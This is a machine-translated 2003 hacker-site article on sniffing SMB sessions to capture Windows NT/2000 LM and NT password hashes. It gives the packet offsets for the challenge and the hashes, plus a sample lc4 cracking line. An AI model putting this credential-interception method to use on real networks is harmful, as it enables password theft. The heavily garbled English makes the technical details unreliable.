52157.com network security technology alliance - original China hacker alliance ChinaHU hacker technology QQ robs the number OICQ password legend to rob the number hacker network technology to invade red guest wooden horse virus hacker alliance network security security technology NT Win2K Win2000 MCSE the Cisco router switchboard software programming password to explain the registration bomb
      Was visited 45,570 time








        Stand home page Technical digest Security loophole Procedure downloading 
      The home station serves Cool site link Technical forum


            Origin:Xiaobai (xiaobai) renews the date: 2003-4-27 6:51:18 reading 
            number of times: 35

            Conversation the non- mainstream invasion kidnaps winnt/2k HASH


            Stated:
            How is this article only analyzes in the technology comes to kidnap 
            winnt/2k hash through sniffer, regarding this the article possibly 
            creates the harm does not lose any responsibility. 

            Introduction:
            Recently the SMB conversation kidnaps the discussion occupied big 
            technical forum many positions, has attracted many people's vision, 
            simultaneously the green pledge monthly publication 37 issue, the 
            Phrack magazine 60 issue and the security focal point summit also 
            published the related article, caused SMB to converse kidnaps into a 
            hot spot. Because is in the window design flaw, this is one kind is 
            unable to realize the extremely fearful method of attack. This 
            article attempts from the SMB data packet analysis angle to show how 
            intercepts winnt/2k hash, the concrete realization did not announce 
            front, asks the reader to keep firmly in mind the statement.

            Explained:
            In order to enable the article to have pointed, did not discuss 
            about the SMB agreement as well as the SMB conversation process, 
            with time can do not treat seriously, the friend which is interested 
            please voluntarily inquires in the appendix reference documents. In 
            the article mentioned the data packet if does not have specially to 
            explain all is intercepts through Sniffer pro, and in order to 
            analyze conveniently, has removed the physical frame, IP and the TCP 
            head, only leaves behind NETB and SMB are partial.
            Main text:
            The supposition two machines, is Client A, is SMBServer B.
            First, session establishment:
            Tries to let A visit B the specific resources, has a NETBIOS 
            conversation. A transmits Session request, including passes through 
            the encoded NETBIOS name. B in 139 ports monitors connection, after 
            receives A request, B transmits Session confirm, not any content. 
            Has like this established effective session. Session request data 
            packet NETB Type is 0x81, Session confirm data packet NETB Type is 
            0x82, may through judge these two signs in the procedure to 
            determine whether produces effective session, then was allowed to 
            try to find solution to intercept the SMB package.
            Second, Challenge obtaining:
            After the effective session establishment, started to carry on the 
            connection the confirmation to work, from this in step was allowed 
            to obtain the B transmission for A Challenge which stochastically 
            produced by B.
            Process as follows: A transmits a status authentication to B the 
            request, B stochastically has a 8 byte Challenge transmission for A, 
            this Challenge contains in B sends back for A Server in the Response 
            data packet. Intercepts this package after Sniffer pro, removes the 
            physical frame, IP and the TCP head, again removes 4 bytes the NETB 
            heads, is left over is a SMB package of content, again removes 33 
            bytes long SMB Reponse header, then makes 36 bytes to after the 
            displacements, under is the length is 8 bytes Challenge. Challenge 
            which like this obtained which us to have needed the server 
            stochastically produces.
            (Because this article goal lies in disperses a row interception the 
            realization, therefore in the data packet the byte content concrete 
            meaning does not make any explanation, only explains the position, 
            as follows also follows this principle. Wants thoroughly to 
            understand the friend please refer the appendix the reference 
            documents)
            Third, LM&NT HASH obtaining:
            After A obtains B to send back uses in encryption password 
            Challenge, establishes the spatial connection to the B transmission 
            the request, B returns to Server the Response package, this time IPC 
            spatially connects the successful establishment. A then transmits 
            LM&NT HASH to give B, requested the visit specific resources, waits 
            for B the permission. We need to do are intercept A the transmission 
            this SMB package. Under looked how opens solves HASH, or removes the 
            physical frame, IP and the TCP head, again removes 4 bytes the NETB 
            heads, is left over is a SMB package of content, again removes 33 
            bytes long SMB Reponse header, then makes 28 bytes to after the 
            displacements, the under 24 bytes contents is LM HASH, is following 
            closely 24 bytes are NT HASH. Now we have obtained A main engine LM 
            HASH and NT HASH.
            Fourth, HASH explaining
            Front has already obtained Challenge, LM HASH and NT HASH, now we 
            make the lc document format, under was inducts lc4 to come the 
            violence to explain. Lc document format as follows:
            192.168.0.244 ADMINIST-7Z6A4E\Administrator: "": 
            "":89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3:8457623684F27A5EFA5FE7B647E87C36D78616F80594123C:E3A96FF4507B9EDF
            The behind three rows numerals respectively are LM HASH, NT HASH, 
            Challenge.
            Fifth, summary
            This article is for the purpose of to discussing the realization 
            which under winnt/2k the SMB conversation kidnaps, the related 
            question please consult refers to the documents. Because the 
            invasion method is complex, and needs the certain foundation, 
            therefore, grasps the person are not certainly many. I already as 
            far as possible wrote simply, so long as did according to the above 
            step can realize, the specific code realization has not written, had 
            the interest friend to study.

            Reference documents:
            1. SMB/CIFS BY THE ROOT author: Ledin translation reorganization: 
            TOo2y
            2. SMB series (5) --lm/ntlm confirms the machine-made author: Small 
            four
            3. applies the SMB/CIFS agreement author: Ilsy 

            --------------------------------------------------------------------------------
            Related news
            A part of Win2000 invasion method 2003-3-25 16:14:07
            Sniffer some materials 2003-1-22 8:51:55


            Most recent 10 news
            On time ˽ arrangement
            On time rises the foreword arrangement




      Site Program By 52157.com & Interface Design By Dahua
      Internet Explorer V5.5 or higher & 1042@768 For the Best view 
      Html&ASP-52157.com- Ver1.0 Copyright 2002. All rights reserved.
      Processed:484.375 ms

